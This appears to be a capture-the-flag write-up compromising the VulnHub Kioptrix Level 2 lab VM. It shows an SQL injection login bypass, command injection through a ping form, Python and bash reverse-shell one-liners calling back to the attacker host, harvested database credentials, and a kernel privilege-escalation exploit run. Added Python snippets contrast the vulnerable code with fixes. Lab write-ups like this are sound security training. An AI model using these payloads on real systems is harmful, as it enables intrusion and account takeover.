Kioptrix Level 2
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.130 00:0c:29:b2:33:a0 1 60 VMware, Inc.
10.1.1.254 00:50:56:ee:66:c6 1 60 VMware, Inc.
Kali's built-in netdiscover identifies the target as 10.1.1.130. The entries at 10.1.1.1 and 10.1.1.254 carry VMware's 00:50:56 OUI and belong to the virtual network itself (the host-side adapter and the NAT/DHCP service), not to a second target.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.130 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-19 18:20 EST
Nmap scan report for localhost (10.1.1.130)
Host is up (0.0027s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f3e8b1e5863fecf27a318093b52cf72 (RSA1)
| 1024 346b453dbacecab25355ef1e43703836 (DSA)
|_ 1024 684d8cbbb65abd7971b87147ea004261 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 807/udp status
|_ 100024 1 810/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2023-02-19T21:11:06+00:00; -2h09m38s from scanner time.
631/tcp open ipp CUPS 1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
810/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:B2:33:A0 (VMware)
Host script results:
|_clock-skew: -2h09m38s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.79 seconds
Takeaways from the scan: OpenSSH 3.9p1 still offers SSHv1; Apache 2.0.52 on CentOS serves the same untitled site on 80 and 443, with SSLv2 and export-grade ciphers enabled and a certificate that expired in 2010; CUPS 1.1 listens on 631; and MySQL on 3306 answers but reports "unauthorized", meaning it will not talk to our host at all. The two-hour clock skew is just the VM's clock.
Getting a shell
Port 3306
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ mysql -uroot -p -h 10.1.1.130
Enter password:
ERROR 1130 (HY000): Host '10.1.1.143' is not allowed to connect to this MySQL server
MySQL grants accounts per (user, host) pair. There is no entry allowing root to connect from 10.1.1.143, so the server rejects the connection before a password is even checked; any MySQL credentials found later will have to be used from the target itself.
Port 80
Browsing to port 80 returns a user login form. It looked like a login bypass might be possible, but the first few attempts failed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ nikto -h http://10.1.1.130
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.130
+ Target Hostname: 10.1.1.130
+ Target Port: 80
+ Start Time: 2023-02-19 18:25:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8699 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2023-02-19 18:26:35 (GMT-5) (43 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Before trying to break the username and password, check whether any other directories or files can be used.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ gobuster dir -u http://10.1.1.130 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.1.1.130
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/02/19 18:28:01 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 283]
/index.php (Status: 200) [Size: 667]
/manual (Status: 301) [Size: 309] [--> http://10.1.1.130/manual/]
/usage (Status: 403) [Size: 283]
/.html (Status: 403) [Size: 283]
Progress: 1102457 / 1102805 (99.97%)
===============================================================
2023/02/19 18:33:49 Finished
===============================================================
Port 631
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ searchsploit CUPS 1.1
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CUPS 1.1.x - '.HPGL' File Processor Buffer Overflow | linux/remote/24977.txt
CUPS 1.1.x - Cupsd Request Method Denial of Service | linux/dos/22619.txt
CUPS 1.1.x - Negative Length HTTP Header | linux/remote/22106.txt
CUPS 1.1.x - UDP Packet Remote Denial of Service | linux/dos/24599.txt
CUPS < 1.3.8-4 - Local Privilege Escalation | multiple/local/7550.c
CUPS < 2.0.3 - Multiple Vulnerabilities | multiple/remote/37336.txt
CUPS < 2.0.3 - Remote Command Execution | linux/remote/41233.py
CUPS Server 1.1 - GET Denial of Service | linux/dos/1196.c
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ telnet 10.1.1.130 631
Trying 10.1.1.130...
Connected to 10.1.1.130.
Escape character is '^]'.
^CConnection closed by foreign host.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ searchsploit -m linux/remote/41233.py
Exploit: CUPS < 2.0.3 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/41233
Path: /usr/share/exploitdb/exploits/linux/remote/41233.py
Codes: CVE-2015-1158
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/Vulnhub/Kioptrix2-2/41233.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ python2 41233.py -a 10.1.1.130 -b 631 -f
lol ty google
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py
[*] locate available printer
[-] no printers
The exploit stops at its first step: it looks for an existing printer queue to submit a job to, and this CUPS instance has none configured, so port 631 is a dead end here.
Breaking the login
gobuster found no directories or files of value, so next see whether the login form can be bypassed.
Trying a few common SQL injection strings, the following one is enough to get past the login:
admin' #
The single quote closes the username literal and # starts a MySQL comment, so the rest of the WHERE clause, including the password check, is discarded.
After logging in, the page that appears is a ping utility (the pingit.php seen in the web root below). Its input ends up in a system command, so the next task is to inject a command and turn it into a shell.
which nc returns nothing, but which python does: the target has no nc binary but can run Python. The usual Python reverse-shell one-liner is:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.1.1.143",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
In fact the following is enough, because bash itself can open TCP connections through /dev/tcp: bash -i starts an interactive shell, >& sends its stdout and stderr to the socket, and 0>&1 makes stdin read from the same socket. Start the listener on Kali first, then submit the one-liner through the ping form:
bash -i >& /dev/tcp/10.1.1.143/5555 0>&1
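The command injection through the ping form, as an added illustration that is not the write-up's own code. pingit.php's source is never shown, so the example assumes the common pattern of concatenating the submitted address into a shell command line; echo stands in for ping so the block runs offline, and the shell parsing that lets 127.0.0.1; id execute id is the same. The argv and validated forms beside it are the two fixes.

```python
import ipaddress
import subprocess

# Stand-in for the 'ping -c 3' that pingit.php presumably runs (assumption: its
# source is not shown in the write-up). echo keeps the example runnable anywhere.
PING = "echo PING"


def ping_vulnerable(target: str) -> str:
    """User input concatenated into a shell command line and run through /bin/sh.
    Anything after ';', '|', '&&' or inside $( ) in target is executed as a command."""
    cmd = f"{PING} {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_argv(target: str) -> str:
    """Same command without a shell: target is passed as a single argv entry,
    so shell metacharacters are just characters inside one argument."""
    return subprocess.run(PING.split() + [target], capture_output=True, text=True).stdout


def ping_safe(target: str) -> str:
    """Allow-list the input as an IP literal first, then run without a shell.
    Raises ValueError for anything that is not a bare IPv4/IPv6 address."""
    addr = ipaddress.ip_address(target.strip())
    return ping_argv(str(addr))


def is_accepted(target: str) -> bool:
    """True if ping_safe() runs for this input, False if validation rejects it."""
    try:
        ping_safe(target)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    payload = "127.0.0.1; id"  # constructed payload of the kind submitted through the form
    print("shell=True :", ping_vulnerable(payload).strip())
    print("argv       :", ping_argv(payload).strip())
    print("validated  :", is_accepted(payload), "/", is_accepted("127.0.0.1"))
```

With shell=True the output contains the uid= line from id; with an argv list the same string is echoed back verbatim; with validation it never reaches the command at all. Both fixes are needed in practice: argv alone still lets an attacker pass option-like strings (for example -f) to the real ping binary.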
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.130] 32797
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.00$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 root root 4.0K Oct 8 2009 .
drwxr-xr-x 8 root root 4.0K Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1.7K Feb 9 2012 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
bash-3.00$ cd /home
cd /home
bash-3.00$ ls -alh
ls -alh
total 24K
drwxr-xr-x 4 root root 4.0K Oct 12 2009 .
drwxr-xr-x 23 root root 4.0K Feb 19 16:05 ..
drwx------ 2 harold harold 4.0K Oct 12 2009 harold
drwx------ 2 john john 4.0K Oct 8 2009 john
bash-3.00$ cd harold
cd harold
bash: cd: harold: Permission denied
bash-3.00$ cd john
cd john
bash: cd: john: Permission denied
Privilege escalation
bash-3.00$ cat index.php
cat index.php
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");
if ($_POST['uname'] != ""){
$username = $_POST['uname'];
$password = $_POST['psw'];
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
//print $query."<br>";
$result = mysql_query($query);
$row = mysql_fetch_array($result);
//print "ID: ".$row['id']."<br />";
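The login bypass used above and the query from index.php, reproduced as an added example that is not code from the original write-up. It rebuilds index.php's string-concatenated query in Python over an in-memory SQLite table holding the two rows from the users dump, and puts the parameterised version beside it. SQLite has no # comment, so the executable bypass uses admin' -- (with a trailing space, which MySQL also requires for --); build_query() shows the exact string that admin' # produces on the target.

```python
import sqlite3
from typing import Optional, Tuple

# The two rows dumped from the target's webapp.users table in this write-up.
USERS = [(1, "admin", "5afac8d85f"), (2, "john", "66lajGGbla")]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the target's MySQL 'webapp' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def build_query(username: str, password: str) -> str:
    """Assemble the query exactly as index.php does: raw string interpolation."""
    return (
        "SELECT * FROM users WHERE username = '" + username
        + "' AND password='" + password + "'"
    )


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Mirrors index.php: execute the interpolated query and return the first row."""
    return conn.execute(build_query(username, password)).fetchone()


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Parameterised equivalent: values are bound by the driver and can never change
    the statement's structure, so quote-and-comment tricks do nothing."""
    return conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


def run_demo() -> dict:
    """What each login function does with the bypass string and with a real login."""
    conn = make_db()
    bypass = "admin' -- "  # SQLite-compatible equivalent of the admin' # used on the target
    return {
        "mysql_query": build_query("admin' #", "anything"),
        "vuln_bypass": vulnerable_login(conn, bypass, "wrong"),
        "vuln_honest": vulnerable_login(conn, "admin", "wrong"),
        "safe_bypass": safe_login(conn, bypass, "wrong"),
        "safe_real": safe_login(conn, "admin", "5afac8d85f"),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The interpolated query returns the admin row for the bypass string with any password, while the parameterised query returns nothing for it and only succeeds with the real credentials. Note that index.php only tests that uname is non-empty and escapes neither field, which is why UNION-based extraction would work just as well as the comment trick; a prepared statement (mysqli or PDO in PHP) removes the whole class.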
index.php contains the database username and password. Try whether it is also john's shell password:
bash-3.00$ su - john
su - john
Password: hiroshima
su: incorrect password
The same password does work for MySQL locally, which exposes the users table of the webapp database:
mysql> show tables;
show tables;
+------------------+
| Tables_in_webapp |
+------------------+
| users |
+------------------+
1 row in set (0.00 sec)
mysql> select * from users;
select * from users;
+------+----------+------------+
| id | username | password |
+------+----------+------------+
| 1 | admin | 5afac8d85f |
| 2 | john | 66lajGGbla |
+------+----------+------------+
2 rows in set (0.00 sec)
mysql> quit
quit
Bye
bash-3.00$ su - john
su - john
Password: 66lajGGbla
su: incorrect password
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ searchsploit kernel 2.6 | grep 9545
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Pr | linux/local/9545.c
Neither password opens a shell, so the only route left is a local kernel exploit, and the searchsploit results narrow to 9545.c (the sock_sendpage() NULL-pointer dereference, CVE-2009-2692). Its title says PPC, but the same code works on this CentOS guest, as the run below shows. The source is transferred to the target (not shown) and compiled there with the system gcc:
bash-3.00$ gcc -o exploit2 9545.c
gcc -o exploit2 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ chmod +x exploit2
chmod +x exploit2
bash-3.00$ ./exploit2
./exploit2
sh-3.00# cd /root
cd /root
sh-3.00# ls -alh
ls -alh
total 144K
drwxr-x--- 2 root root 4.0K Oct 12 2009 .
drwxr-xr-x 23 root root 4.0K Feb 19 16:05 ..
-rw-r--r-- 1 root root 1.2K Oct 7 2009 anaconda-ks.cfg
-rw-r--r-- 1 root root 215 Feb 9 2012 .bash_history
-rw-r--r-- 1 root root 24 Feb 21 2005 .bash_logout
-rw-r--r-- 1 root root 191 Feb 21 2005 .bash_profile
-rw-r--r-- 1 root root 176 Feb 21 2005 .bashrc
-rw-r--r-- 1 root root 100 Feb 21 2005 .cshrc
-rw-r--r-- 1 root root 53K Oct 7 2009 install.log
-rw-r--r-- 1 root root 3.8K Oct 7 2009 install.log.syslog
-rw------- 1 root root 1.5K Oct 8 2009 .mysql_history
-rw-r--r-- 1 root root 102 Feb 21 2005 .tcshrc
sh-3.00#
Lessons learned
- When using searchsploit to look for a local privilege-escalation exploit, the kernel version sometimes should not be given too precisely, or the relevant exploit does not show up.
- A while ago the same exploit failed to run, but this time it succeeded.
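A small helper for the first lesson, added here and not part of the write-up: it derives the progressively broader search strings to feed searchsploit from a uname -r value, and checks the numeric part against the mainline ranges that CVE-2009-2692 (the sock_sendpage() bug behind 9545.c) covers. The kernel string 2.6.9-55.EL used in the demo is constructed; the write-up never prints uname -r on the target.

```python
import re
from typing import List, Tuple

# Mainline kernel ranges affected by CVE-2009-2692 (sock_sendpage() NULL pointer
# dereference, exploited by Exploit-DB 9545.c): 2.4.4..2.4.37.4 and 2.6.0..2.6.30.4.
AFFECTED = [((2, 4, 4), (2, 4, 37, 4)), ((2, 6, 0), (2, 6, 30, 4))]


def parse_kernel_version(uname_r: str) -> Tuple[int, ...]:
    """Numeric prefix of a uname -r string, e.g. '2.6.9-55.EL' -> (2, 6, 9).
    Distro suffixes (-55.EL, -754.el6, -generic) are dropped."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", uname_r)
    if not m:
        raise ValueError(f"not a kernel version: {uname_r!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def search_terms(uname_r: str) -> List[str]:
    """Search strings from most to least specific: the full string, then the numeric
    version truncated one component at a time down to major.minor. Exploit titles
    rarely carry a distro build number, so the broader terms are the ones that hit."""
    nums = parse_kernel_version(uname_r)
    terms = [uname_r.strip()]
    for n in range(len(nums), 1, -1):
        term = ".".join(str(x) for x in nums[:n])
        if term not in terms:
            terms.append(term)
    return terms


def in_sock_sendpage_range(uname_r: str) -> bool:
    """True if the mainline version lies inside a CVE-2009-2692 range. Only a hint:
    vendor kernels backport fixes (and bugs) without changing this number, which is
    why the Exploit-DB title lists distro releases such as CentOS 4.8/5.3 instead."""
    v = parse_kernel_version(uname_r)
    return any(lo <= v <= hi for lo, hi in AFFECTED)


if __name__ == "__main__":
    kernel = "2.6.9-55.EL"  # constructed example; substitute the real uname -r output
    for term in search_terms(kernel):
        print(f"searchsploit 'linux kernel {term}'")
    print("sock_sendpage range:", in_sock_sendpage_range(kernel))
```

The same truncation applies to any version-keyed exploit search: if the full string yields nothing, try the next term before concluding there is no exploit, and treat the version-range check as a reason to test, not as proof that the box is (or is not) vulnerable.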